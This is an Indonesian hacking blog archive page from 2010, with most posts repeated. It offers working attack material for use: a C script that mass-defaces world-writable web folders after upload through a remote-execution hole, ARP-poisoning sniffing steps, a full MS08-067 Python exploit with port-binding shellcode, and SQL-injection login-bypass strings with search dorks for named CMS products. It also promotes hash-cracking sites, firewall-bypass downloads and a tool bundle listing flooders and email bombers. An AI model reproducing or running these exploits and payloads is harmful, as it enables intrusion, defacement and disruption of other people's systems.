Download
Tampilkan postingan dengan label Hacking. Tampilkan semua postingan
Tampilkan postingan dengan label Hacking. Tampilkan semua postingan
Rabu, 21 April 2010
Jumat, 09 April 2010
mass deface no root?!
MASS DEFACE TANPA ROOTING WHY NOT??
Skrip deface masal tanpa harus rooting (misal pake user nobody)
Copyright By Ph03n1X @ 2005
You may use 'n edited this script of course for education
Commercial use is prohibited
Simpan skrip berikut sebagai file C kemudian dowload ke site yang punya hole remote ekskusi ekskusi skrip ini di server yang punya hole itu...
----------------------------massnoroot.c----------------------------------
/*
Mass Deface script without rooting
Write By Ph03n1X king_purba@yahoo.co.uk
http://student.te.ugm.ac.id/~phoenix03/tutorial
*/
#include "stdio.h"
#include "stdlib.h"
FILE *ax;
char abc[256],bcd[300];
main()
{
/*
Assumsi bahwa semua DocumentRoot virtual domain apache
berada di bawah folder /usr/student/resarch
Untuk mengetahui dimana DocumentRoot silakan cari
di httpd.conf
*/
system("find /usr/student/resarch -perm 777 -type d > folder.txt");
if((ax=fopen("folder.txt","r"))==NULL)
{
printf("Sorry cannot open file folder.txt\n");exit(0);
}
while(fgets(abc,sizeof(abc),ax))
{
abc[strlen(abc)-1]='\0';
sprintf(bcd,"echo Sorry Hack By king_purba@yahoo.co.uk > %s/deface.txt",abc);
system(bcd);
}
system("find /usr/student/resarch -name deface.txt > result.txt");
printf("\nFile yang tercipta dapat anda lihat di file result.txt\n");
printf("Kalo file result kosong berarti usernya jago-jago atau anda udah di chroot :D\n\n");
}
---------------------------EOF-massnoroot.c----------------------------------
Skrip deface masal tanpa harus rooting (misal pake user nobody)
Copyright By Ph03n1X @ 2005
You may use 'n edited this script of course for education
Commercial use is prohibited
Simpan skrip berikut sebagai file C kemudian dowload ke site yang punya hole remote ekskusi ekskusi skrip ini di server yang punya hole itu...
----------------------------massnoroot.c----------------------------------
/*
Mass Deface script without rooting
Write By Ph03n1X king_purba@yahoo.co.uk
http://student.te.ugm.ac.id/~phoenix03/tutorial
*/
#include "stdio.h"
#include "stdlib.h"
FILE *ax;
char abc[256],bcd[300];
main()
{
/*
Assumsi bahwa semua DocumentRoot virtual domain apache
berada di bawah folder /usr/student/resarch
Untuk mengetahui dimana DocumentRoot silakan cari
di httpd.conf
*/
system("find /usr/student/resarch -perm 777 -type d > folder.txt");
if((ax=fopen("folder.txt","r"))==NULL)
{
printf("Sorry cannot open file folder.txt\n");exit(0);
}
while(fgets(abc,sizeof(abc),ax))
{
abc[strlen(abc)-1]='\0';
sprintf(bcd,"echo Sorry Hack By king_purba@yahoo.co.uk > %s/deface.txt",abc);
system(bcd);
}
system("find /usr/student/resarch -name deface.txt > result.txt");
printf("\nFile yang tercipta dapat anda lihat di file result.txt\n");
printf("Kalo file result kosong berarti usernya jago-jago atau anda udah di chroot :D\n\n");
}
---------------------------EOF-massnoroot.c----------------------------------
Sniff it using TCPDUMP & read it with WIRESHARK
Caranya mudah saja :
1. Sniffing dgn TCPDUMP di Mesin hasil ROOTING, stelah sebelumnya ARP Poisoning dijalankan antara Server Target dan Gateway.
# tcpdump -i eth0 -w dump.log
2. Download file hasil TCPDUMP ke Local Kompi yg sdh diinstall WIRESHARK
3. Buka file hasil TCPDUMP di WIRESHARK
Pada Wireshark buka menu OPEN, lalu cari lokasi file hasil tcpdump yg sebelumnya telah di download, lalu sperti biasa klik kanan pada salah satu baris sesi komunikasi TCP dan pilih FOLLOW TCP STREAM.
1. Sniffing dgn TCPDUMP di Mesin hasil ROOTING, stelah sebelumnya ARP Poisoning dijalankan antara Server Target dan Gateway.
# tcpdump -i eth0 -w dump.log
2. Download file hasil TCPDUMP ke Local Kompi yg sdh diinstall WIRESHARK
3. Buka file hasil TCPDUMP di WIRESHARK
Pada Wireshark buka menu OPEN, lalu cari lokasi file hasil tcpdump yg sebelumnya telah di download, lalu sperti biasa klik kanan pada salah satu baris sesi komunikasi TCP dan pilih FOLLOW TCP STREAM.
[metasploit] ms08_067_netapi PoC >> win!@#s xp sp2
Code:
1. Pastikan port 139 dan 445 pada mesin target dalam kondisi terbuka (open), bisa menggunakan NMAP :
#nmap -p 139,445
2. Untuk memastikan Vulner ms08_067_netapi terdapat pada mesin target bisa menggunakan tool ini :
3. Lalu silahkan gunakan Metasploit....
#!/usr/bin/env python
#############################################################################
# MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)
# www.hackingspirits.com
# www.coffeeandsecurity.com
# Email: d3basis.m0hanty @ gmail.com
#############################################################################
import struct
import sys
from threading import Thread #Thread is imported incase you would like to modify
#the src to run against multiple targets.
try:
from impacket import smb
from impacket import uuid
from impacket.dcerpc import dcerpc
from impacket.dcerpc import transport
except ImportError, _:
print 'Install the following library to make this script work'
print 'Impacket : http://oss.coresecurity.com/projects/impacket.html'
print 'PyCrypto : http://www.amk.ca/python/code/crypto.html'
sys.exit(1)
print '#######################################################################'
print '# MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)'
print '# www.hackingspirits.com'
print '# www.coffeeandsecurity.com'
print '# Email: d3basis.m0hanty @ gmail.com'
print '#######################################################################\n'
#Portbind shellcode from metasploit; Binds port to TCP port 4444
shellcode = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
shellcode += "\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9"
shellcode += "\x4a\xb6\xa9\x83\xee\xfc\xe2\xf4\x15\x20\x5d\xe4\x01\xb3\x49\x56"
shellcode += "\x16\x2a\x3d\xc5\xcd\x6e\x3d\xec\xd5\xc1\xca\xac\x91\x4b\x59\x22"
shellcode += "\xa6\x52\x3d\xf6\xc9\x4b\x5d\xe0\x62\x7e\x3d\xa8\x07\x7b\x76\x30"
shellcode += "\x45\xce\x76\xdd\xee\x8b\x7c\xa4\xe8\x88\x5d\x5d\xd2\x1e\x92\x81"
shellcode += "\x9c\xaf\x3d\xf6\xcd\x4b\x5d\xcf\x62\x46\xfd\x22\xb6\x56\xb7\x42"
shellcode += "\xea\x66\x3d\x20\x85\x6e\xaa\xc8\x2a\x7b\x6d\xcd\x62\x09\x86\x22"
shellcode += "\xa9\x46\x3d\xd9\xf5\xe7\x3d\xe9\xe1\x14\xde\x27\xa7\x44\x5a\xf9"
shellcode += "\x16\x9c\xd0\xfa\x8f\x22\x85\x9b\x81\x3d\xc5\x9b\xb6\x1e\x49\x79"
shellcode += "\x81\x81\x5b\x55\xd2\x1a\x49\x7f\xb6\xc3\x53\xcf\x68\xa7\xbe\xab"
shellcode += "\xbc\x20\xb4\x56\x39\x22\x6f\xa0\x1c\xe7\xe1\x56\x3f\x19\xe5\xfa"
shellcode += "\xba\x19\xf5\xfa\xaa\x19\x49\x79\x8f\x22\xa7\xf5\x8f\x19\x3f\x48"
shellcode += "\x7c\x22\x12\xb3\x99\x8d\xe1\x56\x3f\x20\xa6\xf8\xbc\xb5\x66\xc1"
shellcode += "\x4d\xe7\x98\x40\xbe\xb5\x60\xfa\xbc\xb5\x66\xc1\x0c\x03\x30\xe0"
shellcode += "\xbe\xb5\x60\xf9\xbd\x1e\xe3\x56\x39\xd9\xde\x4e\x90\x8c\xcf\xfe"
shellcode += "\x16\x9c\xe3\x56\x39\x2c\xdc\xcd\x8f\x22\xd5\xc4\x60\xaf\xdc\xf9"
shellcode += "\xb0\x63\x7a\x20\x0e\x20\xf2\x20\x0b\x7b\x76\x5a\x43\xb4\xf4\x84"
shellcode += "\x17\x08\x9a\x3a\x64\x30\x8e\x02\x42\xe1\xde\xdb\x17\xf9\xa0\x56"
shellcode += "\x9c\x0e\x49\x7f\xb2\x1d\xe4\xf8\xb8\x1b\xdc\xa8\xb8\x1b\xe3\xf8"
shellcode += "\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\x16\x7d\x49\x79"
shellcode += "\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6"
shellcode += "\xba\xb5\x60\x56\x39\x4a\xb6\xa9"
#Payload for Windows 2000 target
payload_1='\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00'
payload_1+='\x41\x41\x41\x41\x41\x41\x41\x41'
payload_1+='\x41\x41\x41\x41\x41\x41\x41\x41'
payload_1+='\x41\x41'
payload_1+='\x2f\x68\x18\x00\x8b\xc4\x66\x05\x94\x04\x8b\x00\xff\xe0'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\xeb\xcc'
payload_1+='\x00\x00'
#Payload for Windows 2003[SP2] target
payload_2='\x41\x00\x5c\x00'
payload_2+='\x2e\x00\x2e\x00\x5c\x00\x2e\x00'
payload_2+='\x2e\x00\x5c\x00\x0a\x32\xbb\x77'
payload_2+='\x8b\xc4\x66\x05\x60\x04\x8b\x00'
payload_2+='\x50\xff\xd6\xff\xe0\x42\x84\xae'
payload_2+='\xbb\x77\xff\xff\xff\xff\x01\x00'
payload_2+='\x01\x00\x01\x00\x01\x00\x43\x43'
payload_2+='\x43\x43\x37\x48\xbb\x77\xf5\xff'
payload_2+='\xff\xff\xd1\x29\xbc\x77\xf4\x75'
payload_2+='\xbd\x77\x44\x44\x44\x44\x9e\xf5'
payload_2+='\xbb\x77\x54\x13\xbf\x77\x37\xc6'
payload_2+='\xba\x77\xf9\x75\xbd\x77\x00\x00'
if sys.argv[2]=='1': #Windows 2000 Payload
payload=payload_1
print '[-]Windows 2000 payload loaded'
if sys.argv[2]=='2': #Windows 2003[SP2] Payload
payload=payload_2
print '[-]Windows 2003[SP2] payload loaded'
class SRVSVC_Exploit(Thread):
def __init__(self, target, osver, port=445):
super(SRVSVC_Exploit, self).__init__()
self.__port = port
self.target = target
self.osver = osver
def __DCEPacket(self):
print '[-]Initiating connection'
self.__trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % self.target)
self.__trans.connect()
print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % self.target
self.__dce = self.__trans.DCERPC_class(self.__trans)
self.__dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))
# Constructing Malicious Packet
self.__stub='\x01\x00\x00\x00'
self.__stub+='\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00'
self.__stub+=shellcode
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x00\x00\x00\x00'
self.__stub+='\x2f\x00\x00\x00\x00\x00\x00\x00\x2f\x00\x00\x00'
self.__stub+=payload
self.__stub+='\x00\x00\x00\x00'
self.__stub+='\x02\x00\x00\x00\x02\x00\x00\x00'
self.__stub+='\x00\x00\x00\x00\x02\x00\x00\x00'
self.__stub+='\x5c\x00\x00\x00\x01\x00\x00\x00'
self.__stub+='\x01\x00\x00\x00'
return
def run(self):
self.__DCEPacket()
self.__dce.call(0x1f, self.__stub) #0x1f (or 31)- NetPathCanonicalize Operation
print '[-]Exploit sent to target successfully...\n[1]Telnet to port 4444 on target machine...'
if __name__ == '__main__':
try:
target = sys.argv[1]
osver = sys.argv[2]
except IndexError:
print '\nUsage: %s \n' % sys.argv[0]
print 'Example: srvsvcexpl.py 192.168.1.1 2\n'
print 'Select OS Version'
print '[-]Windows 2000: OS Version = 1'
print '[-]Windows 2003[SP2]: OS Version = 2'
sys.exit(-1)
current = SRVSVC_Exploit(target, osver)
current.start()
#print '[-]Exploit sent to target successfully...\n[-]Telnet to port 4444 on target machine...'
============================================================
1. Pastikan port 139 dan 445 pada mesin target dalam kondisi terbuka (open), bisa menggunakan NMAP :
#nmap
2. Untuk memastikan Vulner ms08_067_netapi terdapat pada mesin target bisa menggunakan tool ini :
Here
or
Here
3. Lalu silahkan gunakan Metasploit....
Minggu, 04 April 2010
SURFNOLIMIT: BYPASS PROXY & FIREWALL v 3.0
With SurfNoLimit, you will be able to use your favorite software and to go on n' import which Web site, whatever the restrictions imposed on your lan.
Report Generated: 21.11.2009 at 20.44.46 (GMT 1)
Time for scan: 156 seconds
File Name: surfnolimit_bypass_proxy__firewall_1_21206.exe
File Size: 1593028
MD5 Hash: 9ef62d9cbdb7aeb5e26b19a122b00d87
SHA1 Hash: DBD817988C430A2D5F4C993FED05D7D68EF88B6C
Detection Rate: 0 on 24 (0%)
Status: CLEAN
Antivirus Sig version Engine Version Result
a-squared 21/11/2009 4.5.0.8 -
Avira AntiVir 7.10.1.43 7.6.0.59 -
Avast 091121-0 4.8.1229 -
AVG 270.14.76/2517 8.0.0.0 -
BitDefender 21/11/2009 7.0.0.2555 -
ClamAV 21/11/2009 0.95.1 -
Comodo 2985 3.12.560 -
Dr.Web 21/11/2009 5.0 -
Ewido 21/11/2009 4.0.0.2 -
F-PROT6 20091121 4.5.1.85 -
G-Data 19.8928 2.0.7309.847 -
Ikarus T3 21/11/2009 1001074 -
Kaspersky 21/11/2009 8.0.0.357 -
McAfee 21/11/2009 5.1.0.0 -
NOD32 v3 4626 3.0.677 -
Norman 2009/11/03 5.92.08 -
Panda 20/10/2009 9.5.1.00 -
QuickHeal 21/11/2009 10.0 -
Solo Antivirus 21/11/2009 8.0 -
Sophos 21/11/2009 4.32.0 -
TrendMicro 641(664100) 1.1-1001 -
VBA32 21/11/2009 3.12.0.300 -
VirusBuster 10.113.25 1.4.3 -
ZonerAntivirus 21/11/2009 0.2.0 -
Extra Information
CRC32: 1186955103
Self-Extract Archive: Yes => RarSFX Archive
Binder Detector: Nothing found
PDF Exploit Scan: Nothing found
HTML Exploit Scan: Nothing found
Time for scan: 156 seconds
File Name: surfnolimit_bypass_proxy__firewall_1_21206.exe
File Size: 1593028
MD5 Hash: 9ef62d9cbdb7aeb5e26b19a122b00d87
SHA1 Hash: DBD817988C430A2D5F4C993FED05D7D68EF88B6C
Detection Rate: 0 on 24 (0%)
Status: CLEAN
Antivirus Sig version Engine Version Result
a-squared 21/11/2009 4.5.0.8 -
Avira AntiVir 7.10.1.43 7.6.0.59 -
Avast 091121-0 4.8.1229 -
AVG 270.14.76/2517 8.0.0.0 -
BitDefender 21/11/2009 7.0.0.2555 -
ClamAV 21/11/2009 0.95.1 -
Comodo 2985 3.12.560 -
Dr.Web 21/11/2009 5.0 -
Ewido 21/11/2009 4.0.0.2 -
F-PROT6 20091121 4.5.1.85 -
G-Data 19.8928 2.0.7309.847 -
Ikarus T3 21/11/2009 1001074 -
Kaspersky 21/11/2009 8.0.0.357 -
McAfee 21/11/2009 5.1.0.0 -
NOD32 v3 4626 3.0.677 -
Norman 2009/11/03 5.92.08 -
Panda 20/10/2009 9.5.1.00 -
QuickHeal 21/11/2009 10.0 -
Solo Antivirus 21/11/2009 8.0 -
Sophos 21/11/2009 4.32.0 -
TrendMicro 641(664100) 1.1-1001 -
VBA32 21/11/2009 3.12.0.300 -
VirusBuster 10.113.25 1.4.3 -
ZonerAntivirus 21/11/2009 0.2.0 -
Extra Information
CRC32: 1186955103
Self-Extract Archive: Yes => RarSFX Archive
Binder Detector: Nothing found
PDF Exploit Scan: Nothing found
HTML Exploit Scan: Nothing found
Download
or
UltraSurf 9.5
Privacy, Security and Freedom
Privacy
Protect Internet privacy with anonymous surfing and browsing. Hide IP addresses and locations, clean browsing history, cookies & more ...
Security
Completely transparent data transfer and high level encryption of the content allow you to surf the web with high security.
Freedom
UltraSurf allows you to overcome the censorship and blockage on the Internet. You can browse any website freely, so as to obtain true information from the free world.
Facts of UltraSurf:
* Service provided for 6 years
* Millions of users
* Users from over 150 countries
* Daily hits over 300 million
* Daily traffic over 5,000 GB
Protect Internet privacy with anonymous surfing and browsing. Hide IP addresses and locations, clean browsing history, cookies & more ...
Security
Completely transparent data transfer and high level encryption of the content allow you to surf the web with high security.
Freedom
UltraSurf allows you to overcome the censorship and blockage on the Internet. You can browse any website freely, so as to obtain true information from the free world.
Facts of UltraSurf:
* Service provided for 6 years
* Millions of users
* Users from over 150 countries
* Daily hits over 300 million
* Daily traffic over 5,000 GB
Download
Url dumper
File Info
Report date: 2010-03-26 13:37:24 (GMT 1)
File name: URL_Dumper_V.2.rar
File size: 410921 bytes
MD5 Hash: 0cfc31a287ef4b5596bd43a166b6f546
SHA1 Hash: f24c80444a71df1d0dbd551d4fa10424526175b2
Detection rate: 0 on 21 (0%)
Status: CLEAN
Detections
a-squared - -
Avast - -
AVG - -
Avira AntiVir - -
BitDefender - -
ClamAV - -
Comodo - -
Dr.Web - -
Ewido - -
F-PROT6 - -
G-Data - -
Ikarus T3 - -
Kaspersky - -
McAfee - -
NOD32 - -
Panda - -
Solo - -
TrendMicro - -
VBA32 - -
VirusBuster - -
Zoner - -
Scan report generated by
NoVirusThanks.org
Report date: 2010-03-26 13:37:24 (GMT 1)
File name: URL_Dumper_V.2.rar
File size: 410921 bytes
MD5 Hash: 0cfc31a287ef4b5596bd43a166b6f546
SHA1 Hash: f24c80444a71df1d0dbd551d4fa10424526175b2
Detection rate: 0 on 21 (0%)
Status: CLEAN
Detections
a-squared - -
Avast - -
AVG - -
Avira AntiVir - -
BitDefender - -
ClamAV - -
Comodo - -
Dr.Web - -
Ewido - -
F-PROT6 - -
G-Data - -
Ikarus T3 - -
Kaspersky - -
McAfee - -
NOD32 - -
Panda - -
Solo - -
TrendMicro - -
VBA32 - -
VirusBuster - -
Zoner - -
Scan report generated by
NoVirusThanks.org
Download
Jumat, 02 April 2010
IP Anonymous surfing tools 16 in 1
IP Anonymous Surfing Tool 16in1 | 66 MB
Includes:
01 #1 Anonymous Proxy List Verifier 1.1
02 Anonimity 4 Proxy 2.8
03 Charon 0.6
04 Get Anonymous 2.1
05 Ghost Surf Platinum 2007
06 Hide ip Platinum 3.42
07 Hide The Ip 2.1.1
08 Invisible Browsing 5
09 IP Switcher Professional 1.01.12.0
10 Multi Proxy v1.2
11 Net Conceal Anonymity Shield 5.2.059.02
12 Proxy Switcher Standard 3.7.2.3913
13 Proxy grab 0.6
14 proxy way extra v3.2
15 Smart Proxy Helper 1.5
16 Steganos Internet Anonym 2006 v8.0.1
and more..........
Includes:
01 #1 Anonymous Proxy List Verifier 1.1
02 Anonimity 4 Proxy 2.8
03 Charon 0.6
04 Get Anonymous 2.1
05 Ghost Surf Platinum 2007
06 Hide ip Platinum 3.42
07 Hide The Ip 2.1.1
08 Invisible Browsing 5
09 IP Switcher Professional 1.01.12.0
10 Multi Proxy v1.2
11 Net Conceal Anonymity Shield 5.2.059.02
12 Proxy Switcher Standard 3.7.2.3913
13 Proxy grab 0.6
14 proxy way extra v3.2
15 Smart Proxy Helper 1.5
16 Steganos Internet Anonym 2006 v8.0.1
and more..........
Download
147 online crackers
credit : md search
MD4, MD5, SHA1
Code
http://www.milw0rm.com/cracker/
http://www.plain-text.info/add/
http://www.securitystats.com/tools/hashcrack.php
http://www.passcrack.spb.ru/
http://gdataonline.com/seekhash.php
http://www.md5-brute.com/
http://www.md5encryption.com/
http://www.insidepro.com/hashes.php?lang=rus
http://www.cirt.net/cgi-bin/passwd.pl
http://passcracking.ru
http://www.hashchecker.com/?_sls=add_hash
http://www.tydal.nu/category/
http://md5.dustinfineout.com/
http://www.md5-db.com/
http://www.md5hashes.com/
MD4, MD5, SHA1
Code
http://www.milw0rm.com/cracker/
http://www.plain-text.info/add/
http://www.securitystats.com/tools/hashcrack.php
http://www.passcrack.spb.ru/
http://gdataonline.com/seekhash.php
http://www.md5-brute.com/
http://www.md5encryption.com/
http://www.insidepro.com/hashes.php?lang=rus
http://www.cirt.net/cgi-bin/passwd.pl
http://passcracking.ru
http://www.hashchecker.com/?_sls=add_hash
http://www.tydal.nu/category/
http://md5.dustinfineout.com/
http://www.md5-db.com/
http://www.md5hashes.com/
Rabu, 31 Maret 2010
StatCounteX 3.1 Multiple Vulnerabilities
========================================
StatCounteX 3.1 Multiple Vulnerabilities
========================================
# Exploit Title: StatCounteX 3.1 Multiple Vulnerabilities
# Author: Phenom
# Software Link: http://www.2enetworx.com/dev/projects/download.asp?pid=4&rid=34
# Version: 3.1
# Tested on: Windows xp sp3
########### StatCounteX 3.1 Multiple Vulnerabilities ############
#
# Author : Phenom
#
# app version : 3.1
#
#################################################################################
####### Exploit #################################################################
#
# 1 - Database Disclosure Vulnerability
#
# http://site.com/path/stats.mdb
#
# 2 - Remote Admin Access Vulnerability
#
# http://site.com/path/admin.asp
#
# here you can edit tables and configuration
#
#################################################################################
StatCounteX 3.1 Multiple Vulnerabilities
========================================
# Exploit Title: StatCounteX 3.1 Multiple Vulnerabilities
# Author: Phenom
# Software Link: http://www.2enetworx.com/dev/projects/download.asp?pid=4&rid=34
# Version: 3.1
# Tested on: Windows xp sp3
########### StatCounteX 3.1 Multiple Vulnerabilities ############
#
# Author : Phenom
#
# app version : 3.1
#
#################################################################################
####### Exploit #################################################################
#
# 1 - Database Disclosure Vulnerability
#
# http://site.com/path/stats.mdb
#
# 2 - Remote Admin Access Vulnerability
#
# http://site.com/path/admin.asp
#
# here you can edit tables and configuration
#
#################################################################################
WSC CMS (Bypass) SQL Injection Vulnerability
============================================
WSC CMS (Bypass) SQL Injection Vulnerability
============================================
############### WSC CMS (Bypass) SQL Injection Vulnerability ###################################
#
# Author : Phenom
#
# Dork : Realizzato con WSC CMS by Dynamicsoft
#
################################################################################################
####### Exploit ################################################################################
#
# 1- http://server/public/backoffice
#
# 2- login with "admin" as user name and 'or' as password
#
################################################################################################
WSC CMS (Bypass) SQL Injection Vulnerability
============================================
############### WSC CMS (Bypass) SQL Injection Vulnerability ###################################
#
# Author : Phenom
#
# Dork : Realizzato con WSC CMS by Dynamicsoft
#
################################################################################################
####### Exploit ################################################################################
#
# 1- http://server/public/backoffice
#
# 2- login with "admin" as user name and 'or' as password
#
################################################################################################
Majoda CMS (Auth Bypass) SQL Injection Vulnerability
====================================================
Majoda CMS (Auth Bypass) SQL Injection Vulnerability
====================================================
# Exploit Title: Majoda CMS (Auth Bypass) SQL Injection Vulnerability
# Date: 2010-02-28
# Author: Phenom
# Tested on: windows xp sp3
############### Majoda CMS (Auth Bypass) SQL Injection Vulnerability ###########################
#
# Author : Phenom
#
#
# Dork : "Majoda CMS"
#
################################################################################################
####### Exploit ################################################################################
#
# http://site/admin/index.asp
#
# AnvDndarnamn(Username) : 'OR '' = '
# LZhsenord(password) : 'OR '' = '
#
################################################################################################
Majoda CMS (Auth Bypass) SQL Injection Vulnerability
====================================================
# Exploit Title: Majoda CMS (Auth Bypass) SQL Injection Vulnerability
# Date: 2010-02-28
# Author: Phenom
# Tested on: windows xp sp3
############### Majoda CMS (Auth Bypass) SQL Injection Vulnerability ###########################
#
# Author : Phenom
#
#
# Dork : "Majoda CMS"
#
################################################################################################
####### Exploit ################################################################################
#
# http://site/admin/index.asp
#
# AnvDndarnamn(Username) : 'OR '' = '
# LZhsenord(password) : 'OR '' = '
#
################################################################################################
Jumat, 26 Maret 2010
Net Tools 2010
1) IP Address Scanner
2) IP Calculator
3) IP Converter
4) Port Listener
5) Port Scanner
6) Ping
7) NetStat (2 ways)
8) Trace Route (2 ways)
9) TCP/IP Configuration
10) Online - Offline Checker
11) Resolve Host & IP
12) Time Sync
13) Whois & MX Lookup
14) Connect0r
15) Connection Analysator and protector
16) Net Sender
17) E-mail seeker
18) Net Pager
19) Active and Passive port scanner
20) Spoofer
21) Hack Trapper
22) HTTP flooder (DoS)
23) Mass Website Visiter
24) Advanced Port Scanner
25) Trojan Hunter (Multi IP)
26) Port Connecter Tool
27) Advanced Spoofer
28) Advanced Anonymous E-mailer
29) Simple Anonymous E-mailer
30) Anonymous E-mailer with Attachment Support
31) Mass E-mailer
32) E-mail Bomber
33) E-mail Spoofer
34) Simple Port Scanner (fast)
35) Advanced Netstat Monitoring
36) X Pinger
37) Web Page Scanner
38) Fast Port Scanner
39) Deep Port Scanner
40) Fastest Host Scanner (UDP)
41) Get Header
42) Open Port Scanner
43) Multi Port Scanner
44) HTTP scanner (Open port 80 subnet scanner)
45) Multi Ping for Cisco Routers
46) TCP Packet Sniffer
47) UDP flooder
48) Resolve and Ping
49) Multi IP ping
50) File Dependency Sniffer
51) EXE-joiner (bind 2 files)
52) Encrypter
53) Advanced Encryption
54) File Difference Engine
55) File Comparasion
56) Mass File Renamer
57) Add Bytes to EXE
58) Variable Encryption
59) Simple File Encryption
60) ASCII to Binary (and Binary to ASCII)
61) Enigma
62) Password Unmasker
63) Credit Card Number Validate and Generate
64) Create Local HTTP Server
65) eXtreme UDP Flooder
66) Web Server Scanner
67) Force Reboot
68) Webpage Info Seeker
69) Bouncer
70) Advanced Packet Sniffer
71) IRC server creater
72) Connection Tester
73) Fake Mail Sender
74) Bandwidth Monitor
75) Remote Desktop Protocol Scanner
76) MX Query
77) Messenger Packet Sniffer
78) API Spy
79) DHCP Restart
80) File Merger
81) E-mail Extractor (crawler / harvester bot)
82) Open FTP Scanner
83) Advanced System Locker
84) Advanced System Information
85) CPU Monitor
86) Windows Startup Manager
87) Process Checker
88) IP String Collecter
89) Mass Auto-Emailer (Database mailer; Spammer)
90) Central Server (Base Server; Echo Server; Time Server; Telnet Server; HTTP Server; FTP Server)
91) Fishing Port Scanner (with named ports)
92) Mouse Record / Play Automation (Macro Tool)
93) Internet / LAN Messenger Chat (Server + Client)
94) Timer Shutdown/Restart/Log Off/Hibernate/Suspend/ Control
95) Hash MD5 Checker
96) Port Connect - Listen tool
97) Internet MAC Address Scanner (Multiple IP)
98) Connection Manager / Monitor
99) Direct Peer Connecter (Send/Receive files + chat)
100) Force Application Termination (against Viruses and Spyware)
101) Easy and Fast Screenshot Maker (also Web Hex Color Picker)
102) COM Detect and Test
103) Create Virtual Drives
104) URL Encoder
105) WEP/WPA Key Generator
106) Sniffer.NET
107) File Shredder
108) Local Access Enumerater
109) Steganographer (Art of hiding secret data in pictures)
110) Subnet Calculater
111) Domain to IP (DNS)
112) Get SNMP Variables
113) Internet Explorer Password Revealer
114) Advanced Multi Port Scanner
115) Port Identification List (+port scanner)
116) Get Quick Net Info
117) Get Remote MAC Address
118) Share Add
119) Net Wanderer
120) WhoIs Console
121) Cookies Analyser
122) Hide Secret Data In Files
123) Packet Generator
124) Secure File Splitting
125) My File Protection (Password Protect Files, File Injections)
126) Dynamic Switch Port Mapper
127) Internet Logger (Log URL)
128) Get Whois Servers
129) File Split&Merge
130) Hide Drive
131) Extract E-mails from Documents
132) Net Tools Mini (Client/Server, Scan, ICMP, Net Statistics, Interactive, Raw Packets, DNS, Whois, ARP, Computer's IP, Wake On LAN)
133) Hook Spy
134) Software Uninstaller
135) Tweak & Clean XP
136) Steganographic Random Byte Encryption
137) NetTools Notepad (encrypt your sensitive data)
138) File Encrypter/Decrypter
139) Quick Proxy Server
140) Connection Redirector (HTTP, IRC, ... All protocols supported)
141) Local E-mail Extractor
142) Recursive E-mail Extractor
143) Outlook Express E-mail Extractor
144) Telnet Client
145) Fast Ip Catcher
146) Monitor Host IP
147) FreeMAC (MAC Address Editor)
148) QuickFTP Server (+user accounts support)
149) NetTools Macro Recorder/Player (Keybord and Mouse Hook)
150) Network Protocol Analyzer
151) Steganographic Tools (Picture, Sounds, ZIP Compression and Misc Methods)
152) WebMirror (Website Ripper)
153) GeoLocate IP
154) Google PageRank Calculator
155) Google Link Crawler (Web Result Grabber)
156) Network Adapter Binder
157) Remote LAN PC Lister
158) Fast Sinusoidal Encryption
159) Software Scanner
160) Fast FTP Client
161) Network Traffic Analysis
162) Network Traffic Visualiser
163) Internet Protocol Scanner
164) Net Meter (Bandwidth Traffic Meter)
165) Net Configuration Switcher
166) Advanced System Hardware Info
167) Live System Information
168) Network Profiler
169) Network Browser
170) Quick Website Maker and Web Gallery Creator
171) Remote PC Shutdown
172) Serial Port Terminal
173) Standard Encryptor
174) Tray Minimizer
175) Extra Tools (nmap console & win32 version)
Download
Here
2) IP Calculator
3) IP Converter
4) Port Listener
5) Port Scanner
6) Ping
7) NetStat (2 ways)
8) Trace Route (2 ways)
9) TCP/IP Configuration
10) Online - Offline Checker
11) Resolve Host & IP
12) Time Sync
13) Whois & MX Lookup
14) Connect0r
15) Connection Analysator and protector
16) Net Sender
17) E-mail seeker
18) Net Pager
19) Active and Passive port scanner
20) Spoofer
21) Hack Trapper
22) HTTP flooder (DoS)
23) Mass Website Visiter
24) Advanced Port Scanner
25) Trojan Hunter (Multi IP)
26) Port Connecter Tool
27) Advanced Spoofer
28) Advanced Anonymous E-mailer
29) Simple Anonymous E-mailer
30) Anonymous E-mailer with Attachment Support
31) Mass E-mailer
32) E-mail Bomber
33) E-mail Spoofer
34) Simple Port Scanner (fast)
35) Advanced Netstat Monitoring
36) X Pinger
37) Web Page Scanner
38) Fast Port Scanner
39) Deep Port Scanner
40) Fastest Host Scanner (UDP)
41) Get Header
42) Open Port Scanner
43) Multi Port Scanner
44) HTTP scanner (Open port 80 subnet scanner)
45) Multi Ping for Cisco Routers
46) TCP Packet Sniffer
47) UDP flooder
48) Resolve and Ping
49) Multi IP ping
50) File Dependency Sniffer
51) EXE-joiner (bind 2 files)
52) Encrypter
